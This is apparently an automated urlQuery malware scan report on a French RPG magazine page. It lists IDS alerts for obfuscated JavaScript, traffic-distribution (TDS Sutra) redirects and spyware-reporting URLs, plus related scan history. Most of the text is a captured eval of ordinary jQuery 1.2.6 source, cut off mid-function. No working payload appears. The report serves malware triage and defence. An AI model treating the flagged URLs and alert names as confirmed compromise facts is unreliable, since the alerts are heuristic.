Overview

URLhttp://www.rpgmagazine.fr/site/?p=156
IP94.23.3.194
ASNAS16276 OVH Systems
Location France
Report completed2012-11-06 12:51:11 CET
StatusLoading report..
urlQuery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-06 12:50:33 94.23.3.194 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding
2012-11-06 12:50:33 94.23.3.194 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding
2012-11-06 12:50:33 94.23.3.194 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of substr % Encoding
2012-11-06 12:50:33 94.23.3.194 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of unescape % Encoding
2012-11-06 12:50:33 94.23.3.194 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of Script Tag % Encoding
2012-11-06 12:50:33 94.23.3.194 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of document.write % Encoding
2012-11-06 12:50:34 urlQuery Client 64.74.223.372ET CURRENT_EVENTS TDS Sutra - request in.cgi
2012-11-06 12:50:35 urlQuery Client 64.74.223.372ET CURRENT_EVENTS TDS Sutra - request in.cgi
2012-11-06 12:50:36 urlQuery Client 195.159.219.101ET MALWARE Casalemedia Spyware Reporting URL Visited 2
2012-11-06 12:50:37 urlQuery Client 195.159.219.101ET MALWARE Casalemedia Spyware Reporting URL Visited 2
2012-11-06 12:50:37 urlQuery Client 195.159.219.101ET MALWARE Casalemedia Spyware Reporting URL Visited 3
2012-11-06 12:50:38 urlQuery Client 173.194.69.1132ET CURRENT_EVENTS TDS Sutra - request in.cgi
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 94.23.3.194

Date Alerts / IDS URL IP
2012-11-23 23:07:570 / 13http://rpgmagazine.fr/site?p=5594.23.3.194
2012-11-23 23:07:390 / 13http://www.rpgmagazine.fr/site/?p=5594.23.3.194
2012-11-23 18:46:180 / 6http://www.rpgmagazine.fr/site?p=5594.23.3.194
2012-11-23 10:17:550 / 13http://www.rpgmagazine.fr/site?p=5594.23.3.194
2012-11-22 14:23:120 / 8http://www.rpgmagazine.fr/site?p=31894.23.3.194
2012-11-20 11:37:060 / 13http://www.rpgmagazine.fr/site/?p=15694.23.3.194

Last 6 reports on ASN: AS16276 OVH Systems

Date Alerts / IDS URL IP
2013-02-17 19:34:340 / 0http://ultrawarez.eu176.31.156.76
2013-02-17 19:13:390 / 0http://www.root-me.org/Valix.html188.165.33.26
2013-02-17 19:13:380 / 0http://www.supportduweb.com/ftp/ybouane/scripts_astuces/php/espace_membre/profile.php?id=103594.23.48.119
2013-02-17 18:56:490 / 0http://angellsummers.com213.186.33.4
2013-02-17 18:32:010 / 1http://www.campingo.cat/go.php?id=856188.165.236.148
2013-02-17 18:22:390 / 1http://www.calypsosex.com/178.33.63.188

Last 6 reports on domain: www.rpgmagazine.fr

Date Alerts / IDS URL IP
2012-11-23 23:07:390 / 13http://www.rpgmagazine.fr/site/?p=5594.23.3.194
2012-11-23 18:46:180 / 6http://www.rpgmagazine.fr/site?p=5594.23.3.194
2012-11-23 10:17:550 / 13http://www.rpgmagazine.fr/site?p=5594.23.3.194
2012-11-22 14:23:120 / 8http://www.rpgmagazine.fr/site?p=31894.23.3.194
2012-11-20 11:37:060 / 13http://www.rpgmagazine.fr/site/?p=15694.23.3.194
2012-11-19 23:10:210 / 15http://www.rpgmagazine.fr/site/?p=31894.23.3.194



JavaScript

Executed Scripts (17)


Executed Evals (1)

#1 JavaScript::Eval (size: 45922, repeated: 1)

(function() {
    var w = window.jQuery,
        _$ = window.$;
    var D = window.jQuery = window.$ = function(a, b) {
            return new D.fn.init(a, b)
        };
    var u = /^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/,
        isSimple = /^.[^:#\[\.]*$/,
        undefined;
    D.fn = D.prototype = {
        init: function(d, b) {
            d = d || document;
            if (d.nodeType) {
                this[0] = d;
                this.length = 1;
                return this
            }
            if (typeof d == "string") {
                var c = u.exec(d);
                if (c && (c[1] || !b)) {
                    if (c[1]) d = D.clean([c[1]], b);
                    else {
                        var a = document.getElementById(c[3]);
                        if (a) {
                            if (a.id != c[3]) return D().find(d);
                            return D(a)
                        }
                        d = []
                    }
                } else return D(b).find(d)
            } else if (D.isFunction(d)) return D(document)[D.fn.ready ? "ready" : "load"](d);
            return this.setArray(D.makeArray(d))
        },
        jquery: "1.2.6",
        size: function() {
            return this.length
        },
        length: 0,
        get: function(a) {
            return a == undefined ? D.makeArray(this) : this[a]
        },
        pushStack: function(b) {
            var a = D(b);
            a.prevObject = this;
            return a
        },
        setArray: function(a) {
            this.length = 0;
            Array.prototype.push.apply(this, a);
            return this
        },
        each: function(a, b) {
            return D.each(this, a, b)
        },
        index: function(b) {
            var a = -1;
            return D.inArray(b && b.jquery ? b[0] : b, this)
        },
        attr: function(c, a, b) {
            var d = c;
            if (c.constructor == String) if (a === undefined) return this[0] && D[b || "attr"](this[0], c);
            else {
                d = {};
                d[c] = a
            }
            return this.each(function(i) {
                for (c in d) D.attr(b ? this.style : this, c, D.prop(this, d[c], b, i, c))
            })
        },
        css: function(b, a) {
            if ((b == 'width' || b == 'height') && parseFloat(a) < 0) a = undefined;
            return this.attr(b, a, "curCSS")
        },
        text: function(b) {
            if (typeof b != "object" && b != null) return this.empty().append((this[0] && this[0].ownerDocument || document).createTextNode(b));
            var a = "";
            D.each(b || this, function() {
                D.each(this.childNodes, function() {
                    if (this.nodeType != 8) a += this.nodeType != 1 ? this.nodeValue : D.fn.text([this])
                })
            });
            return a
        },
        wrapAll: function(b) {
            if (this[0]) D(b, this[0].ownerDocument).clone().insertBefore(this[0]).map(function() {
                var a = this;
                while (a.firstChild) a = a.firstChild;
                return a
            }).append(this);
            return this
        },
        wrapInner: function(a) {
            return this.each(function() {
                D(this).contents().wrapAll(a)
            })
        },
        wrap: function(a) {
            return this.each(function() {
                D(this).wrapAll(a)
            })
        },
        append: function() {
            return this.domManip(arguments, true, false, function(a) {
                if (this.nodeType == 1) this.appendChild(a)
            })
        },
        prepend: function() {
            return this.domManip(arguments, true, true, function(a) {
                if (this.nodeType == 1) this.insertBefore(a, this.firstChild)
            })
        },
        before: function() {
            return this.domManip(arguments, false, false, function(a) {
                this.parentNode.insertBefore(a, this)
            })
        },
        after: function() {
            return this.domManip(arguments, false, true, function(a) {
                this.parentNode.insertBefore(a, this.nextSibling)
            })
        },
        end: function() {
            return this.prevObject || D([])
        },
        find: function(b) {
            var c = D.map(this, function(a) {
                return D.find(b, a)
            });
            return this.pushStack(/[^+>] [^+>]/.test(b) || b.indexOf("..") > -1 ? D.unique(c) : c)
        },
        clone: function(e) {
            var f = this.map(function() {
                if (D.browser.msie && !D.isXMLDoc(this)) {
                    var a = this.cloneNode(true),
                        container = document.createElement("div");
                    container.appendChild(a);
                    return D.clean([container.innerHTML])[0]
                } else return this.cloneNode(true)
            });
            var d = f.find("*").andSelf().each(function() {
                if (this[E] != undefined) this[E] = null
            });
            if (e === true) this.find("*").andSelf().each(function(i) {
                if (this.nodeType == 3) return;
                var c = D.data(this, "events");
                for (var a in c) for (var b in c[a]) D.event.add(d[i], a, c[a][b], c[a][b].data)
            });
            return f
        },
        filter: function(b) {
            return this.pushStack(D.isFunction(b) && D.grep(this, function(a, i) {
                return b.call(a, i)
            }) || D.multiFilter(b, this))
        },
        not: function(b) {
            if (b.constructor == String) if (isSimple.test(b)) return this.pushStack(D.multiFilter(b, this, true));
            else b = D.multiFilter(b, this);
            var a = b.length && b[b.length - 1] !== undefined && !b.nodeType;
            return this.filter(function() {
                return a ? D.inArray(this, b) < 0 : this != b
            })
        },
        add: function(a) {
            return this.pushStack(D.unique(D.merge(this.get(), typeof a == 'string' ? D(a) : D.makeArray(a))))
        },
        is: function(a) {
            return !!a && D.multiFilter(a, this).length > 0
        },
        hasClass: function(a) {
            return this.is("." + a)
        },
        val: function(b) {
            if (b == undefined) {
                if (this.length) {
                    var c = this[0];
                    if (D.nodeName(c, "select")) {
                        var e = c.selectedIndex,
                            values = [],
                            options = c.options,
                            one = c.type == "select-one";
                        if (e < 0) return null;
                        for (var i = one ? e : 0, max = one ? e + 1 : options.length; i < max; i++) {
                            var d = options[i];
                            if (d.selected) {
                                b = D.browser.msie && !d.attributes.value.specified ? d.text : d.value;
                                if (one) return b;
                                values.push(b)
                            }
                        }
                        return values
                    } else return (this[0].value || "").replace(/\r/g, "")
                }
                return undefined
            }
            if (b.constructor == Number) b += '';
            return this.each(function() {
                if (this.nodeType != 1) return;
                if (b.constructor == Array && /radio|checkbox/.test(this.type)) this.checked = (D.inArray(this.value, b) >= 0 || D.inArray(this.name, b) >= 0);
                else if (D.nodeName(this, "select")) {
                    var a = D.makeArray(b);
                    D("option", this).each(function() {
                        this.selected = (D.inArray(this.value, a) >= 0 || D.inArray(this.text, a) >= 0)
                    });
                    if (!a.length) this.selectedIndex = -1
                } else this.value = b
            })
        },
        html: function(a) {
            return a == undefined ? (this[0] ? this[0].innerHTML : null) : this.empty().append(a)
        },
        replaceWith: function(a) {
            return this.after(a).remove()
        },
        eq: function(i) {
            return this.slice(i, i + 1)
        },
        slice: function() {
            return this.pushStack(Array.prototype.slice.apply(this, arguments))
        },
        map: function(b) {
            return this.pushStack(D.map(this, function(a, i) {
                return b.call(a, i, a)
            }))
        },
        andSelf: function() {
            return this.add(this.prevObject)
        },
        data: function(d, b) {
            var a = d.split(".");
            a[1] = a[1] ? "." + a[1] : "";
            if (b === undefined) {
                var c = this.triggerHandler("getData" + a[1] + "!", [a[0]]);
                if (c === undefined && this.length) c = D.data(this[0], d);
                return c === undefined && a[1] ? this.data(a[0]) : c
            } else return this.trigger("setData" + a[1] + "!", [a[0], b]).each(function() {
                D.data(this, d, b)
            })
        },
        removeData: function(a) {
            return this.each(function() {
                D.removeData(this, a)
            })
        },
        domManip: function(g, f, h, d) {
            var e = this.length > 1,
                elems;
            return this.each(function() {
                if (!elems) {
                    elems = D.clean(g, this.ownerDocument);
                    if (h) elems.reverse()
                }
                var b = this;
                if (f && D.nodeName(this, "table") && D.nodeName(elems[0], "tr")) b = this.getElementsByTagName("tbody")[0] || this.appendChild(this.ownerDocument.createElement("tbody"));
                var c = D([]);
                D.each(elems, function() {
                    var a = e ? D(this).clone(true)[0] : this;
                    if (D.nodeName(a, "script")) c = c.add(a);
                    else {
                        if (a.nodeType == 1) c = c.add(D("script", a).remove());
                        d.call(b, a)
                    }
                });
                c.each(evalScript)
            })
        }
    };
    D.fn.init.prototype = D.fn;

    function evalScript(i, a) {
        if (a.src) D.ajax({
            url: a.src,
            async: false,
            dataType: "script"
        });
        else D.globalEval(a.text || a.textContent || a.innerHTML || "");
        if (a.parentNode) a.parentNode.removeChild(a)
    }
    function now() {
        return +new Date
    }
    D.extend = D.fn.extend = function() {
        var b = arguments[0] || {},
            i = 1,
            length = arguments.length,
            deep = false,
            options;
        if (b.constructor == Boolean) {
            deep = b;
            b = arguments[1] || {};
            i = 2
        }
        if (typeof b != "object" && typeof b != "function") b = {};
        if (length == i) {
            b = this;
            --i
        }
        for (; i < length; i++) if ((options = arguments[i]) != null) for (var c in options) {
            var a = b[c],
                copy = options[c];
            if (b === copy) continue;
            if (deep && copy && typeof copy == "object" && !copy.nodeType) b[c] = D.extend(deep, a || (copy.length != null ? [] : {}), copy);
            else if (copy !== undefined) b[c] = copy
        }
        return b
    };
    var E = "jQuery" + now(),
        uuid = 0,
        windowData = {},
        exclude = /z-?index|font-?weight|opacity|zoom|line-?height/i,
        defaultView = document.defaultView || {};
    D.extend({
        noConflict: function(a) {
            window.$ = _$;
            if (a) window.jQuery = w;
            return D
        },
        isFunction: function(a) {
            return !!a && typeof a != "string" && !a.nodeName && a.constructor != Array && /^[\s[]?function/.test(a + "")
        },
        isXMLDoc: function(a) {
            return a.documentElement && !a.body || a.tagName && a.ownerDocument && !a.ownerDocument.body
        },
        globalEval: function(a) {
            a = D.trim(a);
            if (a) {
                var b = document.getElementsByTagName("head")[0] || document.documentElement,
                    script = document.createElement("script");
                script.type = "text/javascript";
                if (D.browser.msie) script.text = a;
                else script.appendChild(document.createTextNode(a));
                b.insertBefore(script, b.firstChild);
                b.removeChild(script)
            }
        },
        nodeName: function(b, a) {
            return b.nodeName && b.nodeName.toUpperCase() == a.toUpperCase()
        },
        cache: {},
        data: function(c, d, b) {
            c = c == window ? windowData : c;
            var a = c[E];
            if (!a) a = c[E] = ++uuid;
            if (d && !D.cache[a]) D.cache[a] = {};
            if (b !== undefined) D.cache[a][d] = b;
            return d ? D.cache[a][d] : a
        },
        removeData: function(c, b) {
            c = c == window ? windowData : c;
            var a = c[E];
            if (b) {
                if (D.cache[a]) {
                    delete D.cache[a][b];
                    b = "";
                    for (b in D.cache[a]) break;
                    if (!b) D.removeData(c)
                }
            } else {
                try {
                    delete c[E]
                } catch (e) {
                    if (c.removeAttribute) c.removeAttribute(E)
                }
                delete D.cache[a]
            }
        },
        each: function(d, a, c) {
            var e, i = 0,
                length = d.length;
            if (c) {
                if (length == undefined) {
                    for (e in d) if (a.apply(d[e], c) === false) break
                } else for (; i < length;) if (a.apply(d[i++], c) === false) break
            } else {
                if (length == undefined) {
                    for (e in d) if (a.call(d[e], e, d[e]) === false) break
                } else for (var b = d[0]; i < length && a.call(b, i, b) !== false; b = d[++i]) {}
            }
            return d
        },
        prop: function(b, a, c, i, d) {
            if (D.isFunction(a)) a = a.call(b, i);
            return a && a.constructor == Number && c == "curCSS" && !exclude.test(d) ? a + "px" : a
        },
        className: {
            add: function(c, b) {
                D.each((b || "").split(/\s+/), function(i, a) {
                    if (c.nodeType == 1 && !D.className.has(c.className, a)) c.className += (c.className ? " " : "") + a
                })
            },
            remove: function(c, b) {
                if (c.nodeType == 1) c.className = b != undefined ? D.grep(c.className.split(/\s+/), function(a) {
                    return !D.className.has(b, a)
                }).join(" ") : ""
            },
            has: function(b, a) {
                return D.inArray(a, (b.className || b).toString().split(/\s+/)) > -1
            }
        },
        swap: function(b, c, a) {
            var e = {};
            for (var d in c) {
                e[d] = b.style[d];
                b.style[d] = c[d]
            }
            a.call(b);
            for (var d in c) b.style[d] = e[d]
        },
        css: function(d, e, c) {
            if (e == "width" || e == "height") {
                var b, props = {
                    position: "absolute",
                    visibility: "hidden",
                    display: "block"
                },
                    which = e == "width" ? ["Left", "Right"] : ["Top", "Bottom"];

                function getWH() {
                    b = e == "width" ? d.offsetWidth : d.offsetHeight;
                    var a = 0,
                        border = 0;
                    D.each(which, function() {
                        a += parseFloat(D.curCSS(d, "padding" + this, true)) || 0;
                        border += parseFloat(D.curCSS(d, "border" + this + "Width", true)) || 0
                    });
                    b -= Math.round(a + border)
                }
                if (D(d).is(":visible")) getWH();
                else D.swap(d, props, getWH);
                return Math.max(0, b)
            }
            return D.curCSS(d, e, c)
        },
        curCSS: function(f, l, k) {
            var e, style = f.style;

            function color(b) {
                if (!D.browser.safari) return false;
                var a = defaultView.getComputedStyle(b, null);
                return !a || a.getPropertyValue("color") == ""
            }
            if (l == "opacity" && D.browser.msie) {
                e = D.attr(style, "opacity");
                return e == "" ? "1" : e
            }
            if (D.browser.opera && l == "display") {
                var d = style.outline;
                style.outline = "0 solid black";
                style.outline = d
            }
            if (l.match(/float/i)) l = y;
            if (!k && style && style[l]) e = style[l];
            else if (defaultView.getComputedStyle) {
                if (l.match(/float/i)) l = "float";
                l = l.replace(/([A-Z])/g, "-$1").toLowerCase();
                var c = defaultView.getComputedStyle(f, null);
                if (c && !color(f)) e = c.getPropertyValue(l);
                else {
                    var g = [],
                        stack = [],
                        a = f,
                        i = 0;
                    for (; a && color(a); a = a.parentNode) stack.unshift(a);
                    for (; i < stack.length; i++) if (color(stack[i])) {
                        g[i] = stack[i].style.display;
                        stack[i].style.display = "block"
                    }
                    e = l == "display" && g[stack.length - 1] != null ? "none" : (c && c.getPropertyValue(l)) || "";
                    for (i = 0; i < g.length; i++) if (g[i] != null) stack[i].style.display = g[i]
                }
                if (l == "opacity" && e == "") e = "1"
            } else if (f.currentStyle) {
                var h = l.replace(/\-(\w)/g, function(a, b) {
                    return b.toUpperCase()
                });
                e = f.currentStyle[l] || f.currentStyle[h];
                if (!/^\d+(px)?$/i.test(e) && /^\d/.test(e)) {
                    var j = style.left,
                        rsLeft = f.runtimeStyle.left;
                    f.runtimeStyle.left = f.currentStyle.left;
                    style.left = e || 0;
                    e = style.pixelLeft + "px";
                    style.left = j;
                    f.runtimeStyle.left = rsLeft
                }
            }
            return e
        },
        clean: function(l, h) {
            var k = [];
            h = h || document;
            if (typeof h.createElement == 'undefined') h = h.ownerDocument || h[0] && h[0].ownerDocument || document;
            D.each(l, function(i, d) {
                if (!d) return;
                if (d.constructor == Number) d += '';
                if (typeof d == "string") {
                    d = d.replace(/(<(\w+)[^>]*?)\/>/g, function(b, a, c) {
                        return c.match(/^(abbr|br|col|img|input|link|meta|param|hr|area|embed)$/i) ? b : a + "></" + c + ">"
                    });
                    var f = D.trim(d).toLowerCase(),
                        div = h.createElement("div");
                    var e = !f.indexOf("<opt") && [1, "<select multiple='multiple'>", "</select>"] || !f.indexOf("<leg") && [1, "<fieldset>", "</fieldset>"] || f.match(/^<(thead|tbody|tfoot|colg|cap)/) && [1, "<table>", "</table>"] || !f.indexOf("<tr") && [2, "<table><tbody>", "</tbody></table>"] || (!f.indexOf("<td") || !f.indexOf("<th")) && [3, "<table><tbody><tr>", "</tr></tbody></table>"] || !f.indexOf("<col") && [2, "<table><tbody></tbody><colgroup>", "</colgroup></table>"] || D.browser.msie && [1, "div<div>", "</div>"] || [0, "", ""];
                    div.innerHTML = e[1] + d + e[2];
                    while (e[0]--) div = div.lastChild;
                    if (D.browser.msie) {
                        var g = !f.indexOf("<table") && f.indexOf("<tbody") < 0 ? div.firstChild && div.firstChild.childNodes : e[1] == "<table>" && f.indexOf("<tbody") < 0 ? div.childNodes : [];
                        for (var j = g.length - 1; j >= 0; --j) if (D.nodeName(g[j], "tbody") && !g[j].childNodes.length) g[j].parentNode.removeChild(g[j]);
                        if (/^\s/.test(d)) div.insertBefore(h.createTextNode(d.match(/^\s*/)[0]), div.firstChild)
                    }
                    d = D.makeArray(div.childNodes)
                }
                if (d.length === 0 && (!D.nodeName(d, "form") && !D.nodeName(d, "select"))) return;
                if (d[0] == undefined || D.nodeName(d, "form") || d.options) k.push(d);
                else k = D.merge(k, d)
            });
            return k
        },
        attr: function(d, f, c) {
            if (!d || d.nodeType == 3 || d.nodeType == 8) return undefined;
            var e = !D.isXMLDoc(d),
                set = c !== undefined,
                msie = D.browser.msie;
            f = e && D.props[f] || f;
            if (d.tagName) {
                var g = /href|src|style/.test(f);
                if (f == "selected" && D.browser.safari) d.parentNode.selectedIndex;
                if (f in d && e && !g) {
                    if (set) {
                        if (f == "type" && D.nodeName(d, "input") && d.parentNode) throw "type property can't be changed";
                        d[f] = c
                    }
                    if (D.nodeName(d, "form") && d.getAttributeNode(f)) return d.getAttributeNode(f).nodeValue;
                    return d[f]
                }
                if (msie && e && f == "style") return D.attr(d.style, "cssText", c);
                if (set) d.setAttribute(f, "" + c);
                var h = msie && e && g ? d.getAttribute(f, 2) : d.getAttribute(f);
                return h === null ? undefined : h
            }
            if (msie && f == "opacity") {
                if (set) {
                    d.zoom = 1;
                    d.filter = (d.filter || "").replace(/alpha\([^)]*\)/, "") + (parseInt(c) + '' == "NaN" ? "" : "alpha(opacity=" + c * 100 + ")")
                }
                return d.filter && d.filter.indexOf("opacity=") >= 0 ? (parseFloat(d.filter.match(/opacity=([^)]*)/)[1]) / 100) + '' : ""
            }
            f = f.replace(/-([a-z])/ig, function(a, b) {
                return b.toUpperCase()
            });
            if (set) d[f] = c;
            return d[f]
        },
        trim: function(a) {
            return (a || "").replace(/^\s+|\s+$/g, "")
        },
        makeArray: function(b) {
            var a = [];
            if (b != null) {
                var i = b.length;
                if (i == null || b.split || b.setInterval || b.call) a[0] = b;
                else while (i) a[--i] = b[i]
            }
            return a
        },
        inArray: function(b, a) {
            for (var i = 0, length = a.length; i < length; i++) if (a[i] === b) return i;
            return -1
        },
        merge: function(a, b) {
            var i = 0,
                elem, pos = a.length;
            if (D.browser.msie) {
                while (elem = b[i++]) if (elem.nodeType != 8) a[pos++] = elem
            } else while (elem = b[i++]) a[pos++] = elem;
            return a
        },
        unique: function(a) {
            var c = [],
                done = {};
            try {
                for (var i = 0, length = a.length; i < length; i++) {
                    var b = D.data(a[i]);
                    if (!done[b]) {
                        done[b] = true;
                        c.push(a[i])
                    }
                }
            } catch (e) {
                c = a
            }
            return c
        },
        grep: function(c, a, d) {
            var b = [];
            for (var i = 0, length = c.length; i < length; i++) if (!d != !a(c[i], i)) b.push(c[i]);
            return b
        },
        map: function(d, a) {
            var c = [];
            for (var i = 0, length = d.length; i < length; i++) {
                var b = a(d[i], i);
                if (b != null) c[c.length] = b
            }
            return c.concat.apply([], c)
        }
    });
    var v = navigator.userAgent.toLowerCase();
    D.browser = {
        version: (v.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/) || [])[1],
        safari: /webkit/.test(v),
        opera: /opera/.test(v),
        msie: /msie/.test(v) && !/opera/.test(v),
        mozilla: /mozilla/.test(v) && !/(compatible|webkit)/.test(v)
    };
    var y = D.browser.msie ? "styleFloat" : "cssFloat";
    D.extend({
        boxModel: !D.browser.msie || document.compatMode == "CSS1Compat",
        props: {
            "for": "htmlFor",
            "class": "className",
            "float": y,
            cssFloat: y,
            styleFloat: y,
            readonly: "readOnly",
            maxlength: "maxLength",
            cellspacing: "cellSpacing"
        }
    });
    D.each({
        parent: function(a) {
            return a.parentNode
        },
        parents: function(a) {
            return D.dir(a, "parentNode")
        },
        next: function(a) {
            return D.nth(a, 2, "nextSibling")
        },
        prev: function(a) {
            return D.nth(a, 2, "previousSibling")
        },
        nextAll: function(a) {
            return D.dir(a, "nextSibling")
        },
        prevAll: function(a) {
            return D.dir(a, "previousSibling")
        },
        siblings: function(a) {
            return D.sibling(a.parentNode.firstChild, a)
        },
        children: function(a) {
            return D.sibling(a.firstChild)
        },
        contents: function(a) {
            return D.nodeName(a, "iframe") ? a.contentDocument || a.contentWindow.document : D.makeArray(a.childNodes)
        }
    }, function(c, d) {
        D.fn[c] = function(b) {
            var a = D.map(this, d);
            if (b && typeof b == "string") a = D.multiFilter(b, a);
            return this.pushStack(D.unique(a))
        }
    });
    D.each({
        appendTo: "append",
        prependTo: "prepend",
        insertBefore: "before",
        insertAfter: "after",
        replaceAll: "replaceWith"
    }, function(c, b) {
        D.fn[c] = function() {
            var a = arguments;
            return this.each(function() {
                for (var i = 0, length = a.length; i < length; i++) D(a[i])[b](this)
            })
        }
    });
    D.each({
        removeAttr: function(a) {
            D.attr(this, a, "");
            if (this.nodeType == 1) this.removeAttribute(a)
        },
        addClass: function(a) {
            D.className.add(this, a)
        },
        removeClass: function(a) {
            D.className.remove(this, a)
        },
        toggleClass: function(a) {
            D.className[D.className.has(this, a) ? "remove" : "add"](this, a)
        },
        remove: function(a) {
            if (!a || D.filter(a, [this]).r.length) {
                D("*", this).add(this).each(function() {
                    D.event.remove(this);
                    D.removeData(this)
                });
                if (this.parentNode) this.parentNode.removeChild(this)
            }
        },
        empty: function() {
            D(">*", this).remove();
            while (this.firstChild) this.removeChild(this.firstChild)
        }
    }, function(a, b) {
        D.fn[a] = function() {
            return this.each(b, arguments)
        }
    });
    D.each(["Height", "Width"], function(i, c) {
        var b = c.toLowerCase();
        D.fn[b] = function(a) {
            return this[0] == window ? D.browser.opera && document.body["client" + c] || D.browser.safari && window["inner" + c] || document.compatMode == "CSS1Compat" && document.documentElement["client" + c] || document.body["client" + c] : this[0] == document ? Math.max(Math.max(document.body["scroll" + c], document.documentElement["scroll" + c]), Math.max(document.body["offset" + c], document.documentElement["offset" + c])) : a == undefined ? (this.length ? D.css(this[0], b) : null) : this.css(b, a.constructor == String ? a : a + "px")
        }
    });

    function num(a, b) {
        return a[0] && parseInt(D.curCSS(a[0], b, true), 10) || 0
    }
    var C = D.browser.safari && parseInt(D.browser.version) < 417 ? "(?:[\\w*_-]|\\\\.)" : "(?:[\\w\u0128-\uFFFF*_-]|\\\\.)",
        quickChild = new RegExp("^>\\s*(" + C + "+)"),
        quickID = new RegExp("^(" + C + "+)(#)(" + C + "+)"),
        quickClass = new RegExp("^([#.]?)(" + C + "*)");
    D.extend({
        expr: {
            "": function(a, i, m) {
                return m[2] == "*" || D.nodeName(a, m[2])
            },
            "#": function(a, i, m) {
                return a.getAttribute("id") == m[2]
            },
            ":": {
                lt: function(a, i, m) {
                    return i < m[3] - 0
                },
                gt: function(a, i, m) {
                    return i > m[3] - 0
                },
                nth: function(a, i, m) {
                    return m[3] - 0 == i
                },
                eq: function(a, i, m) {
                    return m[3] - 0 == i
                },
                first: function(a, i) {
                    return i == 0
                },
                last: function(a, i, m, r) {
                    return i == r.length - 1
                },
                even: function(a, i) {
                    return i % 2 == 0
                },
                odd: function(a, i) {
                    return i % 2
                },
                "first-child": function(a) {
                    return a.parentNode.getElementsByTagName("*")[0] == a
                },
                "last-child": function(a) {
                    return D.nth(a.parentNode.lastChild, 1, "previousSibling") == a
                },
                "only-child": function(a) {
                    return !D.nth(a.parentNode.lastChild, 2, "previousSibling")
                },
                parent: function(a) {
                    return a.firstChild
                },
                empty: function(a) {
                    return !a.firstChild
                },
                contains: function(a, i, m) {
                    return (a.textContent || a.innerText || D(a).text() || "").indexOf(m[3]) >= 0
                },
                visible: function(a) {
                    return "hidden" != a.type && D.css(a, "display") != "none" && D.css(a, "visibility") != "hidden"
                },
                hidden: function(a) {
                    return "hidden" == a.type || D.css(a, "display") == "none" || D.css(a, "visibility") == "hidden"
                },
                enabled: function(a) {
                    return !a.disabled
                },
                disabled: function(a) {
                    return a.disabled
                },
                checked: function(a) {
                    return a.checked
                },
                selected: function(a) {
                    return a.selected || D.attr(a, "selected")
                },
                text: function(a) {
                    return "text" == a.type
                },
                radio: function(a) {
                    return "radio" == a.type
                },
                checkbox: function(a) {
                    return "checkbox" == a.type
                },
                file: function(a) {
                    return "file" == a.type
                },
                password: function(a) {
                    return "password" == a.type
                },
                submit: function(a) {
                    return "submit" == a.type
                },
                image: function(a) {
                    return "image" == a.type
                },
                reset: function(a) {
                    return "reset" == a.type
                },
                button: function(a) {
                    return "button" == a.type || D.nodeName(a, "button")
                },
                input: function(a) {
                    return /input|select|textarea|button/i.test(a.nodeName)
                },
                has: function(a, i, m) {
                    return D.find(m[3], a).length
                },
                header: function(a) {
                    return /h\d/i.test(a.nodeName)
                },
                animated: function(a) {
                    return D.grep(D.timers, function(b) {
                        return a == b.elem
                    }).length
                }
            }
        },
        parse: [/^(\[) *@?([\w-]+) *([!*$^~=]*) *('?"?)(.*?)\4 *\]/, /^(:)([\w-]+)\("?'?(.*?(\(.*?\))?[^(]*?)"?'?\)/, new RegExp("^([:.#]*)(" + C + "+)")],
        multiFilter: function(a, c, b) {
            var d, cur = [];
            while (a && a != d) {
                d = a;
                var f = D.filter(a, c, b);
                a = f.t.replace(/^\s*,\s*/, "");
                cur = b ? c = f.r : D.merge(cur, f.r)
            }
            return cur
        },
        find: function(t, o) {
            if (typeof t != "string") return [t];
            if (o && o.nodeType != 1 && o.nodeType != 9) return [];
            o = o || document;
            var d = [o],
                done = [],
                last, nodeName;
            while (t && last != t) {
                var r = [];
                last = t;
                t = D.trim(t);
                var l = false,
                    re = quickChild,
                    m = re.exec(t);
                if (m) {
                    nodeName = m[1].toUpperCase();
                    for (var i = 0; d[i]; i++) for (var c = d[i].firstChild; c; c = c.nextSibling) if (c.nodeType == 1 && (nodeName == "*" || c.nodeName.toUpperCase() == nodeName)) r.push(c);
                    d = r;
                    t = t.replace(re, "");
                    if (t.indexOf(" ") == 0) continue;
                    l = true
                } else {
                    re = /^([>+~])\s*(\w*)/i;
                    if ((m = re.exec(t)) != null) {
                        r = [];
                        var k = {};
                        nodeName = m[2].toUpperCase();
                        m = m[1];
                        for (var j = 0, rl = d.length; j < rl; j++) {
                            var n = m == "~" || m == "+" ? d[j].nextSibling : d[j].firstChild;
                            for (; n; n = n.nextSibling) if (n.nodeType == 1) {
                                var g = D.data(n);
                                if (m == "~" && k[g]) break;
                                if (!nodeName || n.nodeName.toUpperCase() == nodeName) {
                                    if (m == "~") k[g] = true;
                                    r.push(n)
                                }
                                if (m == "+") break
                            }
                        }
                        d = r;
                        t = D.trim(t.replace(re, ""));
                        l = true
                    }
                }
                if (t && !l) {
                    if (!t.indexOf(",")) {
                        if (o == d[0]) d.shift();
                        done = D.merge(done, d);
                        r = d = [o];
                        t = " " + t.substr(1, t.length)
                    } else {
                        var h = quickID;
                        var m = h.exec(t);
                        if (m) {
                            m = [0, m[2], m[3], m[1]]
                        } else {
                            h = quickClass;
                            m = h.exec(t)
                        }
                        m[2] = m[2].replace(/\\/g, "");
                        var f = d[d.length - 1];
                        if (m[1] == "#" && f && f.getElementById && !D.isXMLDoc(f)) {
                            var p = f.getElementById(m[2]);
                            if ((D.browser.msie || D.browser.opera) && p && typeof p.id == "string" && p.id != m[2]) p = D('[@id="' + m[2] + '"]', f)[0];
                            d = r = p && (!m[3] || D.nodeName(p, m[3])) ? [p] : []
                        } else {
                            for (var i = 0; d[i]; i++) {
                                var a = m[1] == "#" && m[3] ? m[3] : m[1] != "" || m[0] == "" ? "*" : m[2];
                                if (a == "*" && d[i].nodeName.toLowerCase() == "object") a = "param";
